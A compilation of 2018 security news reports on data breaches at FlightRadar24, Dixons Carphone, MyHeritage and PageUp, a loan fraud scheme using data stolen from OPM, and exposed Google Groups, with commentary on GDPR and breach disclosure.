At the time it is not clear how many users have been affected, the company reported that the incident involved only “small subset” of users.

FlightRadar24 claims to have over than 40 million users per month, this means that the number of affected users could be anyway important.

FlightRadar24 promptly reported the incident to the Swedish Data Protection Authority in order to comply with the EU’s General Data Protection Regulation (GDPR).


Data Stolen in OPM Breach Used in Loan Fraud Scheme
19.6.18 securityweek Incindent

Two individuals pleaded guilty recently over their role in a scheme that involved fraudulent loans obtained using personal information stolen in the massive breach at the U.S. Office of Personnel Management (OPM).

A Maryland woman, Karvia Cross, pleaded guilty on Monday and a co-defendant, Marlon McKnight, admitted being involved in the scheme on June 11. The two pleaded guilty to conspiracy to commit bank fraud and aggravated identity theft. Cross will be sentenced on October 26.

According to authorities, the fraudsters used personal information stolen from the OPM to obtain personal and vehicle loans through the Langley Federal Credit Union (LFCU).

In 2015 and 2016, the financial organization received many online membership and loan applications using identity data compromised in the OPM breach, and the requests were approved prior to LFCU learning that they had been sought using stolen identities.

The fraudsters then withdrew the fraudulently obtained proceeds from the LFCU accounts they had opened.

It’s unclear how the fraudsters obtained the data stolen in the OPM breach. U.S. authorities have blamed Chinese hackers for the attack and last year the FBI even arrested a Chinese national suspected of being involved in the development of the Sakura exploit kit, which was allegedly used in the campaign.

Described as one of the largest breaches of government data in U.S. history, the OPM incident occurred in 2014 and 2015, and it resulted in the theft of personal information from the background checks of roughly 22 million people.


5.9 Million Card Details Accessed in Dixons Carphone Hack
14.6.18 securityweek  Incindent 

Dixons Carphone, a household name in the UK, announced (PDF) today that it is investigating "unauthorised access to certain data held by the company." It describes this access as "an attempt to compromise 5.9 million cards in one of the processing systems of Currys PC World and Dixons Travel stores," and "1.2m records containing non-financial personal data, such as name, address or email address..."

This may turn out to be the biggest ever breach in the UK.

Right now, nothing has been disclosed on how the breach was effected, nor who might be the culprit. There are reports, however, that the incursion started almost a year ago in July 2017. With no technical details available, interest is focusing on why it took so long to discover the breach; how the company is handling the disclosure and notification; and whether the data protection regulator will consider the breach under the UK Data Protection Act 1998, or the EU's General Data Protection Regulation (GDPR) that came into effect on May 25.

The ICO's own statement gives nothing away. A spokesperson said, "It is early in the investigation. We will look at when the incident happened and when it was discovered as part of our work and this will inform whether it is dealt with under the 1998 or 18 Data Protection Acts." For the latter, read 'GDPR' until the UK's Brexit takes effect.

The ambiguity arises because the breach occurred – or at least commenced – in pre-GDPR times. What we don't know is when Dixons Carphone discovered the breach. Since May 25 it will (probably) have been subject to the very strict GDPR breach notification rules.

If the whole incident is considered under GDPR rules, the ICO could potentially fine Dixons Carphone up to 4% of its annual global revenue. Last year the group reported total sales of £10.5 billion ($14 billion). A fine under GDPR could be many hundreds of millions of pounds. Under the Data Protection Act 1998, the maximum fine would be just £500,000 ($670,000).

Technical concerns focus on why it took so long for Dixons Carphone to discover the breach. Robert Wassall, data protection lawyer and head of legal services at ThinkMarble, comments, "The fact that this breach has only just been identified through a routine security review can be viewed from two sides. Yes, it's great that this breach was identified as it proves that the review process and scanning for vulnerabilities works. On the other hand, the breach began in July 2017, why wasn't it identified sooner? How often is security scanning done, given that it has taken almost a year to be found?"

Ross Brewer, VP and MD EMEA at LogRhythm, is less accommodating. "The scale and time-frame of this data breach is staggering," he says. "Initial attempts to access data began in July last year, yet this was only discovered over the past week, indicating that the company lacks vital threat detection capabilities."

The breach notification concerns center around the Dixons Carphone statement. Some commenters praise the apparent speed and fulness of its notification to victims. Ilia Kolochenko, CEO and founder of web security company High-Tech Bridge, says, "With over a billion of compromised records last year, I think this particular incident is of small importance. Many similar breaches occur every day and alas remain unnoticed. Unless we have evidence of malicious exploitation of the allegedly stolen data, no major detriment is imputable upon the victims. In light of these facts, Dixons Carphone's decision to disclose - is rather laudable, albeit one may question the timeline of the disclosure. Many other companies are much less courageous to tell the truth, as even in light of GDPR enforcement, the new law cannot monitor proper disclosure of inconspicuous data breaches."

Others, however, fear that the statement attempts to minimize actual harm over and above warning the victims about potential future harm. Dixons Carphone chief executive, Alex Baldock, said, "we have currently no evidence of fraud as a result of these incidents." The statement also implies that victims needn't worry about their card details, since by far the majority are chip and PIN cards, and no CVVs were included. It does not mention the potential for phishing and other social engineering scams targeted against actual or just potential Dixons Carphone breach victims.

Trevor Resche, threat intelligence office at Trusted Knight, is forthright. "Today's breach of Dixons data will have far reaching consequences for some time. While Dixons has said that there is no evidence of fraud taking place, now the data is in the criminal sphere, it's unlikely to be long before it starts being shopped around amongst criminals, with ensuing phishing and bruteforce attacks launched."

For the moment, we don't know enough about the breach. Dixons Carphone is now working with law enforcement (NCSC), with the financial regulator (FCA), the data protection regulator (ICO), and "leading cyber security experts." While victims will need to monitor their bank accounts closely and be suspicious of all incoming Dixons Carphone-related emails; businesses in general and the cybersecurity industry in particular will be monitoring the reaction of the data protection regulator. If the ICO finds that Dixons Carphone was negligent in its protection of customer data, it could levy a significant fine.


Dixons Carphone data breach, 5.9 million payment cards exposed
13.6.18 securityaffairs Incindent

Retailer Dixons Carphone has disclosed a security breach that involved 5.9 million payment cards and 1.2 million personal data records.
Dixons Carphone discovered an “unauthorised access” to certain data held by the company, it promptly launched an investigation and hired an external firm to shed the light on the case.

The company immediately reported the hack to law enforcement, regulators at the Information Commissioner’s Office and the Financial Conduct Authority.

“As part of a review of our systems and data, we have determined that there has been unauthorised access to certain data held by the company.” reads the data breach notification published by the company.

“Our investigation is ongoing and currently indicates that there was an attempt to compromise 5.9 million cards in one of the processing systems of Currys PC World and Dixons Travel stores. However, 5.8m of these cards have chip and pin protection. The data accessed in respect of these cards contains neither pin codes, card verification values (CVV) nor any authentication data enabling cardholder identification or a purchase to be made. “

The retailer explained that it has no evidence to date of any abuse of the data as result of the hack. The bad news for the customers is that the compromised information included payment card data.

Dixons Travel confirmed that hackers could have accessed data of 5.9 million cards stored in one of the processing systems of Currys PC World and Dixons Travel stores. The company highlighted that 5.8 million of these cards have chip and PIN protection, in these case crooks may have accessed card data contains neither PIN codes, card verification values (CVV) nor any authentication data enabling cardholder identification or a purchase to be made.

Roughly 105,000 non-EU issued payment cards that do not use chip and PIN protection have been compromised.

The firm notified the relevant card companies via its payment provider about all compromised cards.

“Separately, our investigation has also found that 1.2m records containing non-financial personal data, such as name, address or email address, have been accessed. We have no evidence that this information has left our systems or has resulted in any fraud at this stage. We are contacting those whose non-financial personal data was accessed to inform them, to apologise, and to give them advice on any protective steps they should take.” added the company.

This isn’t the first time that the company suffers a security breach, in 2015 another incident exposed the credit card details of 90,000 Dixons Carphone customers.

Affected customers are anyway potentially exposed to phishing attacks and have to be vigilant.


MyHeritage Says Over 92 Million User Accounts Have Been Compromised
8.6.18 thehackernews Incindent

MyHeritage, the Israel-based DNA testing service designed to investigate family history, has disclosed that the company website was breached last year by unknown attackers, who stole login credentials of its more than 92 million customers.
The company learned about the breach on June 4, 18, after an unnamed security researcher discovered a database file named "myheritage" on a private server located outside of the company, and shared it with MyHeritage team.


After analyzing the file, the company found that the database, which included the email addresses and hashed passwords of nearly 92.3 million users, are of those customers who signed up for the MyHeritage website before October 27, 2017.
While the MyHeritage security team is still investigating the data breach to identify any potential exploitation of its system, the company confirmed that no other data such as credit card details and family trees, genetic data were ever breached and are stored on a separate system.
"Credit card information is not stored on MyHeritage to begin with, but only on trusted third-party billing providers (e.g., BlueSnap, PayPal) utilized by MyHeritage," MyHeritage wrote in a blog post published today.
"Other types of sensitive data such as family trees and DNA data are stored by MyHeritage on segregated systems, separate from those that store the email addresses, and they include added layers of security. We have no reason to believe those systems have been compromised."
MyHeritage also confirmed that there was no evidence of account compromise.


The company also notes that it does not store its customer passwords in plaintext; instead, the affected website uses a hashing algorithm with a unique salt to protect users' passwords, making them more resilient to cracking.
Therefore, your stolen passwords are probably safe, but the company still advised all of its users to change their passwords and keep a stronger and unique one, just to be on the safer side.
MyHeritage said it had hired an independent cybersecurity firm to conduct a forensic investigation of the data breach. The company also said it is adding two-factor authentication feature as an option for users.


92 Million User Credentials Exposed in MyHeritage Data Breach
7.6.18 securityweek Incindent

[Updated] MyHeritage, a DNA and genealogy firm, announced Monday that the access credentials of 92 million users had been stolen. It only discovered the breach when a security researcher informed the company he had found a file named myheritage stored outside of MyHeritage.

The file contains, writes MyHeritage CISO Omer Deutsch in a statement, "the email addresses and hashed passwords of 92,283,889 users who had signed up to MyHeritage up to and including Oct 26, 2017 which is the date of the breach." He stresses that the passwords are stored as "a one-way hash of each password, in which the hash key differs for each customer" (possibly implying that each password is hashed with a unique salt).

Deutsch believes that only the credentials were stolen. "We have no reason to believe that any other MyHeritage systems were compromised." Furthermore, he adds, "we have not seen any activity indicating that any MyHeritage accounts had been compromised." Payment data, user DNA data and family trees have not been affected.

MyHeritage went public with commendable speed – on the same day it learnt of the breach. However, some aspects of the statement are concerning. For example, it immediately set up an incident response team to investigate the incident. Best practice would have such a team already established in anticipation of a breach.

The firm is expediting "work on the upcoming two-factor authentication feature that we will make available to all MyHeritage users soon." Best practice would have had MFA in place long ago. Furthermore, it will 'recommend' rather than require users to employ the MFA option. It also recommends users should change their passwords, when it should perhaps force a password reset on all users.

"It appears that MyHeritage hasn't taken the steps to automatically require users to change passwords, just that they recommend they do," comments Absolute Software's Global Security Strategist Richard Henderson. "That should be an immediate action for any breach of this type. We still don't know (and neither do they) how this information was stolen, or the motives for doing so... and the statement by MyHeritage that they believe no other data was taken, especially unique DNA information and genealogy information, is probably a little premature, until they can determine exactly what happened late last October."

The reassuring tone of the MyHeritage statement is also challenged by Anthony James, CMO of CipherCloud. "Don't believe for a second that a hashed password is safe," he says. "Hashed passwords are absolutely not safe if stolen – these hashed passwords are still highly vulnerable to a dictionary attack, where the attacker runs a hash function against the top 100,000 most popular passwords and computes the hash function against all of them. Then all they need do is compare these calculated values to the list stolen from MyHeritage. So, NO, a smart cyber-attacker could be working diligently, even now, to map the hashed values to real passwords and break the accounts."

The unknown quality of the hashing function could make the credential cracking more difficult, but not necessarily impossible. Furthermore, it may not be necessary if the user has had the same password with the same email address stolen in a different breach with a weak hash function. SecurityWeek has contacted MyHeritage asking for further details on the hashing process, and will update this report with any response.

Rick Moy, CMO at Acalvio, is concerned that MyHeritage did not itself detect the intrusion, "as demonstrated by the seven-month delay, and the fact they were alerted by a third party." The implication is that the firm does not have adequate detection capabilities – and if it failed to detect this, there may be other incidents with the other systems that have also gone undetected.

This possibility also concerns Rashmi Knowles, EMEA Field CTO at RSA Security. "If your password is stolen, it can be updated, but this isn't the case with genetic information," she warns. "You only have one genetic identity, so if this is stolen there are potentially much more serious consequences. But many people don't think about this when applying for such services. No matter how secure the organization, no one is completely risk-free, and if breached, genetic data could be sold on to other hackers without your consent, or the characteristic data it contains could be used to hijack your online accounts. There's even a possibility that hackers can amend or even delete genetic data in some cases, which could have serious implications for the victim and the level of healthcare or even health insurance they could access in the future."

There is potentially an additional side-story to this incident. MyHeritage reports, "We are taking steps to inform relevant authorities including as per GDPR." SecurityWeek has asked MyHeritage to expand on this. Who are the relevant GDPR authorities for MyHeritage?

The firm lists numerous contact phone numbers in various European countries, including the provision of "24/7 support" from the Irish phone. This suggests that the Irish regulator may be the relevant GDPR authority for MyHeritage. There is little doubt that MyHeritage is liable under GDPR, and it seems that it is reachable by the GDPR authorities via its European offices. The only question here is whether Europe will decide to make a high-profile example of MyHeritage early into the GDPR age.

But what about the researcher? Is he or she also liable under GDPR for unsanctioned storage of and access to European PII? It is a moot point. The UK's Information Commissioner's Office has told SecurityWeek that researchers are exempt from GDPR under the principle of 'legitimate interest'.

This is not the view of David Flint, senior partner at MacRoberts LLP. Asked if researchers should be concerned about GDPR, he told SecurityWeek, "The short answer is YES! Under the GDPR/DPA 18 the researcher couldn't be a Processor (as he is not acting on instructions of a Controller) therefore he must be a Controller."

So, as a controller, "If a researcher comes across that data he should advise all the Data Subjects that he has the data and what he intends to do with it, sending them a Privacy Notice. (article 14). Article 89 GDPR deals with an exemption for historical research which doesn't seem relevant here."

It is interesting times. MyHeritage users will need to wait to see if their DNA has or may be compromised, researchers will need to wait to see if GDPR may be enforced against them; and businesses around the world – including MyHeritage – will be waiting to see how forcefully GDPR will be enforced by the European Union.

Update

In a new blog posted Wednesday, MyHeritage has announced that it will be retiring all existing MyHeritage passwords. "To maximize the security of our users, we have started the process of expiring ALL user passwords on MyHeritage," writes CISO Omer Deutsch. "This process will take place over the next few days. It will include all 92.3 million affected user accounts plus all 4 million additional accounts that have signed up to MyHeritage after the breach date of October 26, 2017. As of now, we’ve already expired the passwords of more than half of the user accounts on MyHeritage. Users whose passwords were expired are forced to set a new password and will not be able to access their account and data on MyHeritage until they complete this."


HR Software Firm PageUp Suffers Data Breach
6.6.18 securityweek Incindent

PageUp, an Australian company that provides HR software, informed customers this week that it launched an investigation on May 23 after detecting suspicious activity on its IT infrastructure.

The firm’s analysis of the incident revealed on May 28 that hackers may have gained access to names, contact information, usernames, and password hashes. Documents, such as signed employment contracts and resumes, should be safe as they are stored on different servers.

“There is no evidence that there is still an active threat, and the jobs website can continue to be used. All client user and candidate passwords in our database are hashed using bcrypt and salted, however, out of an abundance of caution, we suggest users change their password,” said Karen Cariss, CEO and co-founder of PageUp.

While the company has only shared limited technical information regarding the incident, it did say that the attack involved a piece of malware. The breach has been investigated by both law enforcement and cybersecurity experts. Cybersecurity organizations and data regulators in Australia and the United Kingdom have been notified.

PageUp says it has 2.6 million active users across over 190 countries. Some of the company’s customers have notified job applicants and shut down their online recruitment pages following the incident.

Australia Post, which has been using PageUp since October 2016, highlighted that in the case of individuals whose applications were successful, bank details, tax file numbers and other sensitive information was also stored on PageUp servers. There is no evidence, however, that this data has been accessed by hackers, Australia Post said.

Wesfarmers-owned supermarket chain Coles has shut down its careers website and issued a statement saying it has suspended all connections between its systems and PageUp while an investigation is conducted. Other Wesfarmers retailers, including Kmart, Target and Officeworks, have also shut down their careers websites.

Australian telecoms giant Telstra has also suspended its online recruitment system due to the breach at PageUp. The company warned successful applicants that their date of birth, employment offer details, and pre-employment check outcomes were stored on PageUp systems.

The incident also impacts logistics and supply chain company Linfox and private health insurer Medibank, both of which have suspended their careers pages.

Several universities in the United States also use PageUp. However, at the time of writing, none of the U.S. universities listed on PageUp’s testimonials page have issued security alerts or suspended their online recruitment systems.


Thousands of Organizations Expose Sensitive Data via Google Groups
6.6.18 securityweek Incindent

Google has issued a warning to G Suite users after researchers discovered that thousands of organizations expose sensitive information through misconfigured Google Groups instances.

The Google Groups service allows users to create mailing lists, host internal discussions, and process support tickets. These types of communications can include highly sensitive information, which is why it’s important for companies to ensure that privacy and security settings are configured properly.

When a group is configured, its creator has to set sharing options for “Outside this domain - access to groups” to either “Private” or “Public on the Internet.” While the default option is “Private,” many organizations have set it to “Public on the Internet,” in many cases likely not realizing that anyone can access the group.

Data exposed through misconfigured Google Groups

Researchers at Kenna Security have conducted an analysis of roughly 2.5 million domains and identified more than 9,600 organizations that had allowed public access to their groups. After taking a closer look at a random sample of 171 groups, the company estimated that nearly 3,000 of the over 9,600 companies leaked some type of sensitive information.

The impacted organizations include Fortune 500 companies, universities, hospitals, media firms, financial institutions, and even government agencies.

The exposed information includes financial data, passwords, and documents containing confidential information.

“Given the sensitive nature of this information, possible implications include spear-phishing, account takeover, and a wide variety of case-specific fraud and abuse,” Kenna Security said in a blog post.

The company notified some of the organizations leaking highly sensitive data and pointed out that the “views” counter was in a vast majority of cases at zero, which indicates that no one had seen the information.

Kenna has also notified Google, but since this is not an actual vulnerability, the issue cannot be addressed with a patch. The tech giant did say, however, that it’s always reviewing its products to “help users make decisions that are appropriate for their organizations.”

Google has also published a post on its G Suite blog, providing advice on how users can configure their Google Groups settings to better protect their data.

This is not the first time researchers have warned about the risks associated with misconfigured Google Groups instances. Last year, cloud security firm RedLock warned that hundreds of organizations were likely exposing sensitive data through Google Groups. At the time, the company found names, email and home addresses, employee salary data, sales pipeline data, and customer passwords in the exposed groups.


MyHeritage data breach – 92.3 million user credential exposed
6.6.18 securityaffairs Incindent

A security researcher discovered email addresses and hashed passwords of roughly 92.3 million Myheritage users stored on a private server outside the company.
The huge trove of data was contained in a file named “,” according to the experts the information is authentic and comes from Myheritage.

“Today, June 4, 18 at approximately 1pm EST, MyHeritage’s Chief Information Security Officer received a message from a security researcher that he had found a file named “myheritage” containing email addresses and hashed passwords, on a private server outside of MyHeritage.” reads the data breach notification published by the company.

“Our Information Security Team received the file from the security researcher, reviewed it, and confirmed that its contents originated from MyHeritage and included all the email addresses of users who signed up to MyHeritage up to October 26, 2017, and their hashed passwords.”

MyHeritage offers a service for the investigation of family history and the reconstruction of the family tree through the DNA analysis.

myHeritage familytree

The expert who made the disconcerting discovery reported it to the company on June 4, 18, the incident seems to have affected those users who signed up for the service before and including Oct. 26, 2017.

The expert only found usernames and hashed passwords, no other info was discovered on the server hosting the file.

The company pointed out that passwords were not stored in a plain text but did not explain the hashing mechanism used to protect them.

MyHeritage handles billing information through third parties, while DNA data and other sensitive data are stored on segregated systems.

At the time the company hasn’t observed any abuse of compromised data.

“Since Oct 26, 2017 (the date of the breach) and the present we have not seen any activity indicating that any MyHeritage accounts had been compromised.” continues the notification.

“We believe the intrusion is limited to the user email addresses. We have no reason to believe that any other MyHeritage systems were compromised.”

The company set up an Information Security Incident Response Team to investigate the security breach and is going to hire cybersecurity firm to conduct comprehensive forensic investigations.

The company announced it is planning to introduce the two-factor authentication feature to provide a further protection to its users.

“MyHeritage users who have questions or concerns about this incident can contact our security customer support team via email on privacy@myheritage.com or by phone via the toll-free number (USA) +1 888 672 2875, available 24/7.” concluded the company.

“For all registered users of MyHeritage, we recommend that for maximum safety, they change their password on MyHeritage.”